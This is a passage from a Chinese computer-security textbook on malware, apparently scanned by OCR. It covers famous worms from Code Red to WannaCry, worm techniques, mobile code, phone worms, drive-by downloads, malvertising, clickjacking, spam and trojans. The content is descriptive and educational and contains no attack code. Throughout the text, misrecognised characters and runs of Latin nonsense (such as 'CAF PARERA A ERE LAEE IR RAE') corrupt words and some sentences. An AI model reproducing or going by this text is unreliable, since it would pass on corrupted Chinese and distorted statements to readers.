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向 被 感染 主机 知道 的 所 有 电子 邮件 地 址 转发 上 月 已 ， 进 行 传播 。 因 此 ， 原 先 病 毒 需要 几 个 月 甚至 
几 年 才能 达到 的 传播 范围 ， 如 今 几 个 小 时 就 可 以 做 到 。 文 献 [CASS01] 指出 Melissa 里 虫 只 需 3 
天 时 间 便 可 感染 超过 十 万 台 计 算 机 ， 相 比 之 下 ,老式 病毒 Brain (EAE Lah, te ARE AE TER 
间 感 染 数 千 台 计 算 机 。 这 使 得 反 病毒 软件 在 病毒 造成 很 大 破坏 之 前 做 出 响应 变 得 非常 困难 。 

2001 年 7 月 出 现 的 红色 代码 蠕虫 ( Code Red Worm) 开创 了 蠕虫 威胁 的 新 纪元 。 红 色 代 码 
蠕虫 利用 微软 的 IIS ( Microsoft Internet Information Server) 安全 汤 洞 渗透 到 系统 并 进行 传播 。 
它 还 使 Windows 系统 的 系统 文件 校 验 器 失效 。 该 蠕虫 通过 对 随机 的 IP 地 址 进行 探测 来 传播 到 
其 他 主机 上 。 在 某 段 时 间 内 ， 它 只 进行 传播 。 然 后 ， 它 利用 大 量 被 感染 的 主机 向 一 个 政府 Web 
站 点 发 送 大 量 数 据 包 进 行 “ 拒 绝 服务 ”攻击 。 攻 击 之 后 该 蠕虫 将 暂时 停止 活动 一 段 时 间 ， 并 
定期 重新 展开 攻击 。 在 第 二 轮 攻 击 中 ， 红 色 代 码 蠕虫 在 14 个 小 时 内 感染 了 近 36 万 台 服 务 需 。 
除了 对 目标 服务 器 造成 严重 破坏 外 ， 它 还 占用 了 大 量 的 Internet 资源 ， 并 造成 网 络 服务 中 断 
[MOOR02]. 

2001 年 8 月 首次 出 现 的 红色 代码 开 是 以 Microsoft US 为 攻击 目标 的 蠕虫 变种 。 该 变种 试 
图 感染 与 被 感染 系统 处 于 同一 子 网 的 系统 ， 并 在 被 感染 主机 上 建立 一 个 后 门 ， 使 攻击 者 可 以 在 
这 些 主机 上 远程 执行 命令 。 

2001 年 9 月 发 行 的 尼 姆 达 (Nimda) 蠕虫 也 同时 具备 了 蠕虫 、 病 毒 和 移动 代码 的 特征 。 尼 
姆 达 使 用 了 如 下 儿 种 传播 方式 : 

e 电子 邮件 : 当 用 户 在 一 台 有 安全 漏洞 的 计算 机 上 打开 被 感染 的 电子 邮件 附件 时 ， 尼 

姆 达 被 激活 ， 它 首先 搜索 当前 主机 中 的 电子 邮件 地 址 ， 然 后 问 这 些 地 址 发 送 它 自 里 的 
拷贝 。 
Windows 共享 : 尼 姆 达 会 扫描 主机 ， 寻 找 不 安全 的 Windows 共享 文件 。 然 后 使 用 
NetBIOS86 作为 传输 机 制 去 感染 该 主机 中 的 这 些 共享 文件 ， 这 样 当 某 个 用 户 执 行 了 这 
些 共享 文件 时 尼 姆 达 就 被 激活 了 。 

e Web 服务 器 : 尼 姆 达 扫 描 Web 服务 器 ， 查 看 是 否 存 在 基于 微软 IIS 平台 的 已 知 漏洞 。 

如 果 找 到 ， 它 会 试图 传 一 份 它 自己 的 拷贝 到 服务 希 上 ， 然 后 感染 这 人 台 服 务 硕 和 上 面 的 
所 有 文件 。 

© Web 客户 端 : 当 存 在 漏洞 的 Web 客户 端 去 访问 被 尼 姆 达 感 染 的 服务 融 时 ， 这 个 客户 端 

程序 所 在 的 主机 将 会 被 感染 。 

e all: 如 果 一 个 工作 站 被 早期 的 蠕虫 感染 ， 如 “红色 代码 I”， 尼 姆 达 会 利用 它们 已 经 

设置 好 的 后 门 访问 系统 。 

2003 年 初 ， 出 现 了 SQL Slammer 蠕虫 。 该 蠕虫 利用 了 微软 SQL 服务 硕 上 的 缓冲 区 海 出 漏 
fl, Slammer 蠕虫 的 代码 很 简短 上 且 传 播 极 其 迅速 ， 在 10 分 钟 内 就 感染 了 90% 的 存在 该 漏洞 的 
EHL, 

2003 年 未 ， 出 现 了 Sobig.F iE. CAF PARERA A ERE LAEE IR RAE 
发 送 器 。 在 其 活动 最 频繁 的 时 候 ， 据 报告 显示 每 17 个 邮件 中 就 有 一 个 是 它 发 送 的 ， 而 且 仅 在 
最 初 的 24 个 小 时 内 就 生成 了 一 百 万 份 自 身 的 拷贝 。 

Mydoom 是 2004 年 出 现 的 一 种 大 量 发 送 邮件 的 电子 邮件 蠕虫 。 它 沿袭 了 在 被 感染 计算 机 
上 安装 后 门 的 做 法 ， 从 而 使 黑客 可 以 远程 访问 用 户 的 口令 、 信 用 卡 卡号 等 数据 。Mydoom iiH 
达到 了 每 分 钟 复制 1000 次 的 速度 ， 据 报道 其 在 36 小 时 内 ， 用 1 亿 条 被 感染 的 消息 将 Internet 
MI- 

2006 年 在 许多 版 本 的 平台 中 都 迅速 流行 起 来 的 蠕虫 是 Warezov 蠕虫 家 族 [KIRK06]. “41K 
蠕虫 被 激活 时 ， 它 会 在 系统 目录 下 创建 一 些 可 执行 文件 ， 并 通过 添加 新 的 注册 表 项 ， 把 它 设置 
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成 每 当 Windows 启动 都 自动 运行 。Warezov 在 多 种 类 型 的 文件 中 搜索 电子 邮件 地 址 ， 并 将 其 
本 身 作 为 邮件 附件 发 送 。 它 的 一 些 变种 能 够 下 载 恶 意 软件 ， 如 特洛伊 木马、 广告 软件 等 。 许 多 
Warezov 的 变种 还 会 禁止 安全 相关 产品 的 运行 ， 使 其 不 能 升级 。 

首次 在 2008 年 11 月 发 现 的 Conficker (HIY Downadup) 蠕虫 传播 迅速 ， 成 为 目 2003 年 
SQL Slammer 蠕虫 [LAWT09] 发 现 以 来 传播 感染 最 广泛 的 蠕虫 之 一 。 该 蠕虫 最 初 通 过 Windows 
系统 中 的 缓冲 区 溢出 漏洞 进行 传播 ， 后 续 的 版 本 也 能 通过 USB 设备 或 网 络 文件 共享 进行 传播 。 
当今 ， 虽 然 微软 修复 了 该 肾 虫 所 攻击 的 主要 漏洞 ， 但 它 仍然 是 赛 门 铁 死 (Symantec) 公司 发 现 
的 第 二 大 家 族 型 恶意 软件 [SYMA16]。 . 

2010 年 ， 震 网 (Stuxnet) 蠕虫 病毒 被 发 现 ， 但 是 它 在 先前 的 一 些 时 间 已 经 悄悄 地 传播 开 来 
[CHEN11，KUSH13]。 与 许多 以 往 的 蠕虫 不 同 ， 震 网 蠕虫 故意 限制 其 传播 的 速率 以 减少 其 被 发 
现 的 机 会 。 它 把 目标 对 准 工业 控制 系统 ， 主 要 是 那些 与 伊朗 核 计 划 有 关 的 系统 。 震 网 文 持 多 种 
传播 机 制 ， 包 括 USB 设备 、 网 络 文件 共享 ， 使 用 了 最 少 4 种 未 知 的 0-day 漏洞 。 其 规模 和 代 
码 的 复杂 度 、 前 所 未 有 的 4 个 0-day 漏洞 的 使 用 和 开发 中 的 花 销 与 付出 引发 了 相当 多 的 争论 ， 
有 的 说 法 则 认为 震 网 蠕虫 可 能 是 第 一 个 被 正式 用 来 针对 国家 级 物理 设施 的 网 络 战 武 器 。 而 研究 
人 员 在 分 析 震 网 蠕虫 时 注意 到 ， 尽 管 他 们 预料 到 能 够 发 现 软件 具有 间谍 行为 ， 但 却 从 未 想到 能 
看 到 有 恶意 软件 能 够 有 针对 性 地 破坏 其 目标 。 这 一 结果 已 经 导致 数 个 国家 将 注意 力 转 回 应 用 亚 
意 软 件 作 为 武器 的 方向 上 来 。 

Duqu 蠕虫 发 现 于 2011 年 晚 些 时 候 ， 且 运用 了 与 震 网 蠕虫 相关 的 代码 。 虽 然 同 为 网 络 间谍 
程序 ， 其 目标 却 与 震 网 不 同 (尽管 看 上 去 仍然 是 针对 伊朗 核 计划 的 )。 男 一 个 近期 的 著名 网 络 
间谍 程序 发 现 于 2012 年 ， 其 被 认为 是 针对 中 东 国 家 的 “超级 火焰 ”(Flame) 系列 病毒 。 尽 管 这 
些 蠕 虫 有 着 各 自 不 同 的 针对 区 域 ， 它 们 的 传染 策略 之 成 功 使 得 在 许多 国家 的 计算 机 系统 上 都 发 
现 了 他 们 的 踪迹 ， 甚 至 包括 那些 与 通用 Internet 保持 着 物理 隔离 的 计算 机 系统 。 这 就 更 显示 出 
大 力 改进 对 抗 此 类 蠕虫 感染 的 反 制 措施 的 重要 性 了 。 

在 2017 年 5 月 ，WannaCry 勒索 软件 攻击 草 延 速度 非常 快 ， 在 数 小 时 至 数 天 内 ， 便 感染 了 
150 多 个 国家 的 公共 和 私人 组 织 的 数 十 万 个 系统 (US-CERT Alert TA17-132A) [GOOD17]; € 
通过 积极 扫描 本 地 和 随机 远程 网 络 来 传播 蠕虫 ， 试 图 利用 未 修补 的 Windows 系统 上 的 SMB X 
件 共享 服务 中 的 漏洞 。 这 种 快速 传播 只 是 由 英国 安全 人 研究 人 员 意 外 激活 “致命 转换 ”命令 而 放 
缓 ， 该 研究 人 员 在 该 恶意 软件 的 初始 版 本 中 检查 了 其 存在 。 一 旦 将 其 安装 在 被 感染 的 系统 上 ， 
它 同 样 会 加 密 文件 ， 并 索要 赎金 来 恢复 它们 ， 我 们 接 下 来 将 会 对 其 进行 讨论 。 


6.4.5 ”蠕虫 技术 的 现状 


蠕虫 技术 的 发 展 水 平 包 括 如 下 特征 : 

e 多 平台 (multiplatform): 新 的 蠕虫 不 再 局 限于 Windows 平台 ， 它 们 可 以 攻击 多 种 平台 ， 
尤其 是 那些 流行 的 UNIX 类 平台 ,或 者 攻击 支持 宏 或 脚本 语言 的 流行 的 文档 格式 。 

e 多 种 攻击 手段 (multi-exploit) : 新 的 蠕虫 会 使 用 多 种 方法 对 系统 进行 渗透 ， 例 如 利用 
Web 服务 器 、 浏 览 器 、 电 子 邮 件 、 文 件 共享 或 其 他 的 基于 网 络 的 应 用 程序 漏洞 。 

o 超 快速 传播 (ultrafast spreading): 使 用 多 种 技术 手段 优化 蠕虫 的 传播 速率 ， 尽 可 能 在 短 
时 间 内 感染 尽 可 能 多 的 机 融 。 

e 多 态 (polymorphic) : 为 了 躲避 检测 、 过 滤 和 实时 分 析 ， 肾 虫 借鉴 了 病毒 的 多 态 技术 。 
每 个 蠕虫 的 拷贝 都 能 够 利用 在 功能 上 等 价 的 指令 和 加 密 技 术 来 生成 新 的 代码 。 

© 变形 (metamorphic): 除了 改变 自身 形态 外 ， 变 形 里 虫 还 根据 其 行为 模式 库 在 传播 的 不 
同 阶段 表现 出 不 同 的 行为 。 
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e 传输 载体 ( transport vehicle): 因为 蠕虫 能 够 迅速 地 感染 大 量 系 统 ， 因 此 它们 是 传播 其 
他 分 布 式 攻击 程序 (如 分 布 式 拒绝 服务 bot、rootkit、 垃 圾 电子 邮件 生成 器 和 间谍 软件 ) 
的 理想 载体 。 

è 0-day 攻击 (zero-day exploit): 为 获得 最 大 的 震动 和 扩散 范围 ， 蠕 虫 会 利用 未 被 人 知 
的 漏洞 。 这 种 漏洞 只 有 在 蠕虫 发 起 攻击 时 才 会 被 网 络 公 众 所 发 现 。 在 2015 年 ，54 个 
0-day 漏洞 被 发 现 和 利用 ， 较 往年 有 大 幅 增 加 [SYMA16]。 这 些 漏洞 有 许多 存在 于 通用 
计算 机 和 手机 软件 中 ,但 也 有 些 位 于 公共 库 和 开发 套件 ， 有 些 则 位 于 工业 控制 系统 。 
这 也 表明 了 系统 的 目标 范围 。 


6.4.6 ”移动 代码 


NIST SP 800-28 (活动 内 容 和 移动 代码 指南 ，2008 年 3 月 ) 将 移动 代码 定义 为 那些 不 加 
修改 就 能 够 在 不 同系 统 平台 上 运行 并 且 能 够 实现 相同 功能 的 程序 (如 脚本 、 宏 或 其 他 可 移植 
BS) 0 

移动 代码 能 够 从 远程 系统 传送 到 本 地 系统 ， 然 后 在 没有 得 到 用 户 明 确 许 可 的 情况 下 在 本 
地 系统 中 和 运行。 移动 代码 经 背 作 为 病毒 、 蠕 虫 和 木马 传播 的 载体 ， 将 这 些 恶意 代码 传播 到 用 
户 的 系统 中 。 另 外 ， 移 动 代码 能 够 利用 漏洞 实现 某 些 功能 ， 例 如 非 授 权 的 数据 访问 或 特权 攻 
击 (root compromise)。 第 用 的 移动 代码 载体 类 型 主要 有 Java applet, ActiveX. JavaScript 和 
VBScript。 使 移动 代码 能 够 在 本 地 系统 进行 恶意 操作 的 最 常见 方式 有 器 站 点 脚本 、 交 互 式 动态 
Web 站 点 、 电 子 邮 件 附 件 、 从 不 可 信和 网 站 下 载 程 序 或 者 下 载 不 可 信和 软件 等 。 


6.4.7 手机 蠕虫 


手机 蠕虫 的 发 现 始 于 2004 年 Cabir 蠕虫 的 出 现 ， 随 后 又 在 2005 年 出 现 了 Lasco 和 Comm- 
Warrior 蠕虫 。 这 些 师 虫 通过 蓝牙 无 线 连接 或 彩信 (MMS) 进行 传染 。 手 机 蠕虫 的 感染 目标 是 那 
些 允 许 用 户 从 非 蜂 坑 网 络 经 营 者 处 安装 应 用 程序 的 智能 手机 。 所 有 这 些 早 期 的 手机 蠕虫 以 使 
HÆ (Symbian) 系统 的 手机 为 目标 。 而 近期 的 恶意 软件 则 以 安里 系统 或 华 果 的 iOS 系统 为 
目标 。 这 些 恶 意 程序 可 以 使 手机 完全 将 病 ， 删 除 手机 数据 ， 或 者 癌 收取 额外 费用 的 号 码 发 送 
信息 。 

Comm Warrior 晴 虫 利用 蓝牙 技术 向 接受 区 域内 的 其 他 手机 传播 。 它 也 以 彩信 的 方式 向 手 
机 通讯 录 中 的 号 码 发 送 自己 的 拷贝 ， 而 且 会 自动 回复 收 到 的 短信 和 彩信 。 除 此 之 外 ， 它 还 会 将 
自己 复制 到 手机 的 可 移动 存储 卡 中 并 且 将 自身 搬 人 到 手机 的 程序 安装 文件 中 。 

虽然 上 述 实例 表明 手机 蠕虫 传染 是 可 能 的 ， 但 目前 已 知 的 大 多 数 手 机 恶意 软件 仍 是 通过 含 
有 木马 的 应 用 程序 安装 包 (APP) 植 人 手机 的 [SYMA16]。 


6.4.8 客户 端 漏洞 和 路 过 式 下 载 


另 一 种 攻击 软件 漏洞 的 方式 是 利用 应 用 程序 中 的 缺陷 (bug) 来 安装 恶意 软件 。 其 中 最 普 
通 的 一 种 技术 利用 了 浏览 硕 的 漏洞 ， 使 得 当 用 户 浏 览 一 个 受 攻击 者 控制 的 Web 页 面 时 ， 该 
页 面包 含 的 代码 会 攻击 该 浏览 硕 的 缺陷 并 在 用 户 不 知情 或 未 允许 的 情况 下 辐 系 统 安 装 恶 意 软 
件 。 该 方法 被 称 为 路 过 式 下 载 ( drive-by-download)， 其 是 当今 一 种 常见 的 攻击 方式 。 攻 击 者 
多 年 来 一 直 利 用 Adobe Flash Player 和 Oracle Java 插件 中 的 多 个 漏洞 ， 以 至 许多 浏览 右 现 在 
都 不 再 支持 它们 。 在 多 数 情况 下 ， 这 类 恶意 软件 不 像 蠕 虫 那样 传播 ， 而 是 等 竺 那些 无 防备 的 
用 户 浏览 恶意 的 Web 页 面 来 传播 [SYMA16]。 

通常 ， 路 过 式 下 载 攻击 针对 那些 访问 恶意 站 点 且 系 统 中 有 漏洞 可 以 利用 的 用 户 。 它 的 一 个 
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变种 被 称 为 水 坑 式 攻击 ( watering-hole attack)， 这 是 一 种 具有 高 度 针对 性 的 攻击 。 攻 击 者 通过 
研究 他 们 意图 攻击 的 目标 ， 确 定 他 们 可 能 要 浏览 的 Web 站 点 ， 然 后 扫描 这 些 站 点 找 出 那些 含 
有 能 让 他 们 植 和 人 夹带 式 下 载 的 漏洞 。 等 待 受害 者 去 浏览 那些 有 害 的 站 点 。 他 们 的 攻击 代码 甚至 
可 以 被 设 定 为 只 感染 属于 目标 组 织 的 系统 ， 而 对 其 他 浏览 该 站 点 的 访问 者 没有 影响 。 这 样 极 大 
地 增加 了 受 控制 站 点 无 法 被 检测 出 来 的 可 能 性 。 

恶意 广告 (malvertising) 是 另 一 种 通过 Web 站 点 部 署 恶意 软件 的 技术 ， 该 技术 不 会 真正 损 
E Web 站 点 。 攻 击 者 在 他 们 目标 网 站 付 钱 植 人 包含 有 亚 意 代码 的 广告 。 利 用 这 些 恶 意 植 人 代码 ， 
攻击 者 通过 回访 问 者 展示 广告 来 令 其 感染 。 这 些 恶意 代码 是 动态 生成 的 ， 这 同样 可 以 减少 被 侦 
测 到 的 机 会 ， 或 者 只 感染 特殊 的 系统 。 近 年 来 ， 恶 意 广告 发 展 迅速 ， 因 为 它们 很 容易 被 放置 在 

201) 期 望 的 网 站 上 ， 而 且 几 乎 没有 问题 ， 也 很 难 追踪 。 攻 击 者 在 预料 到 他 们 的 受害 者 可 能 会 浏览 目 

标 网 站 后 仅仅 将 这 些 恶意 广告 放置 几 小 时 ， 以 此 来 大 幅度 降低 恶意 广告 的 可 见 度 [SYMA16]: 

其 他 恶意 软件 也 可 在 用 户 浏览 恶意 的 PDF 文档 时 ， 在 未 经 用 户 允 许 情 况 下 ， 利 用 PDF 阅 
读 器 下 载 和 安装 恶意 软件 [STEV11]。 这 类 恶意 文档 通过 垃圾 电子 邮件 或 者 网 络 钓鱼 进行 传播 ， 
我 们 会 在 下 一 节 讨 论 这 些 内 容 。 


6.4.9 点 击 劫持 


点 击 劫持 (clickjacking)， 也 称 为 用 户 界 面 伪装 攻击 (user-interface(UI) redress attack)， 是 
一 种 攻击 者 收集 被 感染 用 户 鼠 标点 击 信息 的 攻击 。 攻 击 者 可 以 强迫 用 户 做 一 系列 的 事情 ， 从 调 
整 计 算 机 的 设置 到 在 用 户 不 知情 的 情况 下 让 用 户 访问 可 能 含有 恶意 代码 的 网 站 。 同 时 ， 利 用 
Adobe Flash 和 JavaScript， 攻 击 者 甚至 可 能 在 一 个 合法 按钮 的 上 面 或 者 下 面部 署 一 个 按钮 ， 并 
将 其 制作 成 难以 被 用 户 察 觉 的 样子 。 这 种 攻击 的 典型 例子 是 利用 多 重 透 明 或 模糊 的 页 面 层 次 来 
欺骗 用 户 在 试图 点 击 最 上 层 页 面 时 ， 却 实际 上 点 击 了 另 一 个 按钮 或 链接 到 另 一 个 页 面 。 因 此 ， 
攻击 者 实施 点 击 劫持 的 意图 是 将 一 个 页 面 链接 至 属于 其 他 应 用 、 域 名 (也 许 两 者 都 是 ) 的 页 面 。 

利用 类 似 的 技术 ， 键 盘 输 入 也 可 以 被 支持 。 通 过 精心 制作 的 可 定义 模板 ( stylesheet)、 
iframe 标签 和 文本 框 等 页 面 元 素 的 组 合 ， 用 户 会 被 误导 而 以 为 他 们 在 为 电子 邮件 或 银行 账户 输 
入 口令 ， 而 实际 上 他 们 将 口令 输入 到 了 攻击 者 控制 的 一 个 无 形 的 框架 内 。 

现在 有 许多 种 技术 可 以 做 到 点 击 劫持 ， 同 时 也 有 不 少 新 技术 被 开发 出 以 防御 业已 出 现 并 得 
到 实施 的 劫持 技术 ,文献 NIEM11] 和 [STON10] 就 此 做 出 了 有 用 的 讨论 。 


6.5 传播 - 社会 工程 学 - 垃圾 电子 邮件 、 木 马 


最 后 一 种 恶意 代码 传播 方式 我 们 将 围绕 社会 工程 学 展开 讨论 ， 其 “欺骗 ”用 户 协 助 损害 他 
们 自己 的 系统 或 个 人 信息 。 这 种 情况 会 在 用 户 浏览 或 回应 一 些 垃圾 电子 邮件 或 允许 安装 和 执行 
一 些 木马 程序 或 脚本 代码 时 出 现 。 


6.5.1 垃圾 (大 量 不 请 自 来 的 ) 电子 邮件 


近 十 多 年 来 ， 随 着 Internet 爆炸 式 的 发 展 ， 电 于 邮件 得 到 了 广泛 的 应 用 。 由 于 发 送 大 量 的 
电子 邮件 只 需 极 低 的 花费 ， 而 催生 了 大 量 的 不 请 自 来 的 电子 邮件 ， 也 就 是 我 们 熟知 的 垃圾 电子 
邮件 。[SYMA16] 指出 ， 尽 管 近 年 来 垃圾 电子 邮件 的 比例 有 所 下 降 ， 但 其 发 送 量 可 能 占 所 有 邮 
件 发 送 量 的 50% 或 以 上 。 这 同时 增加 了 网 络 设备 传送 这 些 数据 流量 和 用 户 从 大 量 邮件 中 过 滤 
合法 邮件 的 开销 。 为 了 遏制 垃圾 电子 邮件 的 爆炸 式 增 长 ， 提 供 检 测 和 过 滤 垃 圾 邮件 产品 的 反 垃 
圾 邮件 产业 的 增长 也 同样 迅猛 。 这 导致 了 攻防 双方 的 军备 珊 赛 ， 垃圾 邮件 发 送 者 发 明 新 技术 隐 

藏 邮件 内 容 ， 防 御 者 则 致力 于 阻止 它们 [KREI09]。 
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然而 ， 垃 圾 邮件 问题 仍 在 继续 ， 因 为 垃圾 邮件 发 送 者 利用 其 他 方式 到 达 受 害 者 。 这 包括 使 
用 社交 媒体 ， 反 映 这 些 网 络 使 用 的 快速 增长 。 例 如 ，[SYMA16] 描述 了 一 个 成 功 的 减 价 垃圾 邮 
件 活动 ， 该 活动 利用 成 千 上 万 的 假 Twitter 账户 ,彼此 相互 支持 和 加 强 ， 以 增加 它们 的 可 信 度 
和 用 户 追 随 它们 的 可 能 性 ， 然 后 陷入 骗局 。 社 交 网 络 诈骗 往往 依赖 于 分 享 欺 诈 的 受害 者 ,或 者 
通过 提供 虚假 的 奖励 ， 以 协助 它们 的 传播 。 

虽然 一 些 垃圾 邮件 是 由 合法 的 邮件 服务 商 发 送 的 ， 但 是 绝 大 多 数 的 邮件 是 由 僵尸 网 络 操 
纵 僵 尸 机 所 发 送 的 ， 对 此 我 们 会 在 6.6 节 中 进行 讨论 。 一 大 部 分 垃圾 电子 邮件 的 内 容 仅仅 是 广 
告 ， 试 图 说 服 收 件 人 在 线 上 购买 他 们 的 产品 ， 如 医药 ,或 者 用 于 诈骗 ， 例 如 证 券 诈骗 或 钱 又 招 
聘 广 告 。 但 是 垃圾 邮件 同样 是 恶意 软件 的 重要 载体 。 电 子 邮 件 可 能 会 市 有 一 个 附件 文档 ， 如 末 
该 文档 被 打开 ， 它 会 攻击 软件 的 漏洞 来 向 用 户 的 系统 安装 恶意 软件 ， 就 像 我 们 在 之 前 提 及 的 那 
样 。 或 者 ， 垃 圾 邮件 也 可 能 附 有 一 个 木马 程序 或 者 脚本 代码 ， 在 其 运行 时 同样 可 以 回 用 户 的 系 
统 安装 恶意 软件 。 一 些 木 马 利 用 软件 的 漏洞 ， 在 得 到 用 户 许可 的 情况 下 实现 目 身 的 安装 ， 我 们 
接 下 来 将 会 讨论 这 方面 的 内 容 。 最 后 ,垃圾 电子 邮件 可 以 被 用 作 和 钓鱼 攻击 ， 引 叶 用 户 进 入 一 个 
看 上 去 与 合法 网 站 相似 的 非法 网 站 ， 如 网 银 的 网 站 ,试图 从 中 获取 用 户 的 登录 名 和 口令 ,或 者 
收集 足够 的 信息 以 允许 攻击 者 冒充 用 户 喘 份 进行 盗 穷 。 近 年 来 ,不 断 发 展 壮大 的 犯罪 市 场 通过 
向 诈骗 者 出 售 封装 好 的 钓鱼 软件 ， 使 钓鱼 攻击 活动 变 得 更 加 容易 ， 从 而 大 大 地 上 自动 化 了 运行 这 
一 骗局 的 过 程 [SYMA16]。 所 有 这 些 用 途 使 垃圾 邮件 成 为 一 个 重要 的 安全 问题 。 然 而 ， 在 许多 
情况 下 ， 其 需要 用 户 动态 选择 浏览 电子 邮件 和 任何 附加 的 文档 ， 或 者 允许 某 些 程序 的 安 猴 ， 从 
而 达成 妥协 。 因 此 ， 为 用 户 提 供 适 当 的 安全 意识 培训 非常 重要 ， 因 此 他 们 能 够 更 好 地 认识 并 处 
理 此 类 电子 邮件 。 我 们 将 在 第 17 章 进一步 讨论 。 


6.5.2 ”特洛伊 木马 


特洛伊 木马 ?是 一 个 有 用 的 或 者 表面 上 看 起 来 有 用 的 程序 或 命令 过 程 ， 但 其 内 部 藏 有 恶意 
代码 ， 当 被 调用 时 ， 会 执行 非 预期 的 或 有 害 的 功能 。 

特洛伊 木马 程序 可 以 间接 完成 一 些 未 授权 用 户 无 法 直接 完成 的 功能 。 例 如 ， 在 一 个 共 胖 系 
统 中 ， 一 个 用 户 为 了 能 够 在 未 经 另 一 个 用 户 授权 的 情况 下 访问 其 私有 的 文件 ， 设 计 了 一 个 木马 
程序 。 当 木马 程序 被 执行 后 ， 它 会 扫描 用 户 的 文件 以 获取 想 要 的 隐私 信息 并 将 其 拷贝 下 来 通过 
Web 形式 、 电 子 邮件 或 者 文档 信息 的 形式 发 送 给 攻击 者 。 然 后 ， 作 者 可 以 吸引 用 户 运行 该 程 
序 ， 将 其 纳入 游戏 或 有 用 的 实用 程序 中 ， 并 通过 已 知 的 软件 分 发 站 点 或 应 用 商店 。 这 种 方法 最 
近 被 用 于 那些 “声称 ”是 系统 最 新 的 反 病 毒 扫 描 程序 或 安全 更 新 程序 的 实用 程序 ， 但 实际 上 它 
们 是 恶意 木马 程序 ， 通常 会 运载 间谍 软件 等 有 效 载 位 来 搜索 银行 证 书 。 因 此 ， 用 户 害 要 采取 预 
防 措施 来 验证 他 们 安装 的 任何 软件 的 来 源 。 

特洛伊 木马 一 般 属于 下 面 三 种 模型 中 的 一 种 : 

© 继续 执行 源 程序 的 功能 的 同时 ， 男 外 同时 执行 独立 的 恶意 行为 。 | 

© 继续 执行 源 程 序 的 功能 ,但 是 会 对 其 进行 修改 ， 以 执行 恶意 行为 (例如 登录 程序 木马 
会 收集 用 户 的 口令 ) 或 者 隐藏 男 一 个 恶意 行为 (例如 进程 列表 程序 木马 在 列 出 当前 所 有 
进程 时 不 显示 恶意 的 进程 )。 
用 恶意 功能 完全 蔡 代 原 程 序 的 功能 。 


O ”和布 腊 神话 中 ， 和 硕 腊 在 特洛伊 战争 时 使 用 了 特洛伊 森马。Epeios 建造 了 一 个 巨大 的 中 空 型 木马 ， 隐 藏 了 了 30 个 
最 英勇 的 希腊 士兵 。 其 余 的 希腊 军队 烧毁 了 他 们 的 帐篷 假装 逃走 ， 实 际 上 隐蔽 在 了 附近 。 特 洛 俩 人 以 为 木 
马 是 他 们 的 战利品 ， 战 争 已 经 结束 了 ， 他 们 将 木马 拖 入 城内 。 深 夜 ， 木 马 内 的 希腊 士兵 为 希腊 军队 打开 了 
城 门 。 希腊 军队 开始 了 一 场 大 屠杀 ， 导 致 了 特洛伊 城 的 毁灭 和 所 有 市 民 沦 为 奴隶 。 
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一 些 木 马 不 需 要 用 户 的 协助 就 可 以 通过 攻击 软件 的 漏洞 实现 目 动 安装 和 执行 。 它 们 利用 
了 蠕虫 的 一 些 特性 ， 不 同 的 是 木马 并 不 能 自我 复制 。 一 个 此 类 攻击 的 著名 案例 是 在 2009 年 
和 2010 年 年 初 ， 极 光 行 动 ( Operation Aurora) 中 使 用 的 Hydraq 木马 。 它 利用 下 浏览 希 中 
的 漏洞 实现 自我 安装 ， 并 以 数 个 高 知名 度 的 公司 为 其 攻击 目标 。 其 散播 方式 往往 是 利用 垃圾 
邮件 或 者 通过 布置 于 一 个 被 俘获 网 站 中 的 “水 坑 式 攻击 ”来 进行 的 。 技 术 支 持 诈骗 是 一 个 日 
益 增长 的 社会 工程 问题 。 这 些 包括 : 呼叫 中 心 针 对 用 户 计算 机 系统 中 不 存在 的 问题 呼叫 他 们 . 
如 果 用 户 做 出 回应 ， 攻 击 者 会 受 试 出 售 伪造 技术 文 持 或 要 求 他 们 在 其 系统 上 安放 特洛伊 木马 
恶意 软件 或 其 他 不 需要 的 应 用 程序 ， 同 时 声称 这 可 以 解决 他 们 的 问题 [SYMA16]。 


6.5.3 ”手机 木马 


手机 木马 首次 被 发 现 是 在 2004 年 ， 当 时 被 发 现 的 木马 被 称 为 “Skuller”。 和 手机 蠕虫 一 样 ， 
其 目标 是 智能 手机 ， 早 期 的 手机 木马 针对 塞 班 系统 。 近 年 来 ， 很 多 木马 将 目标 转向 了 安 单 手机 
和 苹果 的 iPhone。 这 些 木 马 通 常 通过 服务 于 目标 操作 系统 的 一 个 或 多 个 应 用 程序 市 场 来 传播 。 

智能 手机 销售 和 使 用 的 快速 增长 ( 越 来 越 多 地 包含 有 价值 的 个 人 信息 ) 使 其 成 为 吸引 犯 
罪 分子 和 其 他 攻击 者 的 目标 。 六 款 新 手机 中 有 五 款 和 运行 Android， 所 以 它们 是 一 个 关键 目标 
[SYMA16]。 近 年 来 ， 在 针对 这 些 手 机 的 恶意 软件 系列 中 发 现 的 漏洞 数量 均 稳步 增加 。 最 近 的 
例子 包括 诱骗 用 户 输入 银行 详细 信息 的 网 络 钓鱼 木马 ， 以 及 模仿 Google 设计 风格 使 其 看 起 来 
更 加 合法 和 具有 威胁 性 的 勒索 软件 。 

由 于 苹果 公司 对 其 应 用 商城 的 严格 控制 ， 苹 果 手 机 木马 目标 是 那些 被 “越狱 ”的 手机 ， 并 
旦 木马 通过 非 官 方 网 站 分 发 。 但 是 ,很 多 版 本 的 iOS 系统 包含 一 些 与 图 形 或 PDF 操作 有 关 的 
漏洞 。 实 际 上 这 些 漏洞 正 是 iOS“ 越 狼 ” 的 主要 途径 ， 但 它们 也 给 恶意 软件 侵入 手机 开辟 了 通 
道 。 虽然 苹果 公司 修复 了 许多 汤 洞 ， 但 是 新 的 变种 仍然 陆续 被 发 现 。 这 恰恰 从 侧面 表明 了 ， 即 
便 是 对 资金 和 资源 充足 的 组 织 而 言 ， 在 一 个 复杂 的 系统 (例如 一 个 操作 系统 ) 内 编写 安全 软件 
有 和 多么 的 困难 。 第 10 和 11 章 还 会 再 回 到 这 个 话题 。2015 年 ，XcodeGhost 恶意 软件 在 许多 合 
法 的 Apple Store 应 用 程序 中 被 发 现 。 这 些 应 用 程序 并 非 故意 设计 为 恶意 软件 ， 但 他 们 的 开发 
人 员 使 用 了 一 个 受 损 的 Xcode 开发 系统 ， 该 应 用 程序 在 创建 时 隐藏 了 恶意 软件 [SYMA16]。 这 
是 攻击 者 利用 开发 或 企业 配置 基础 架构 来 协助 恶意 软件 分 发 的 几 个 例子 之 一 。 


6.6 载荷 - 系统 损坏 


一 旦 恶意 软件 在 目标 系统 中 启动 ， 下 一 步 需要 关心 的 就 是 其 在 系统 中 会 有 什么 样 的 行为 ， 
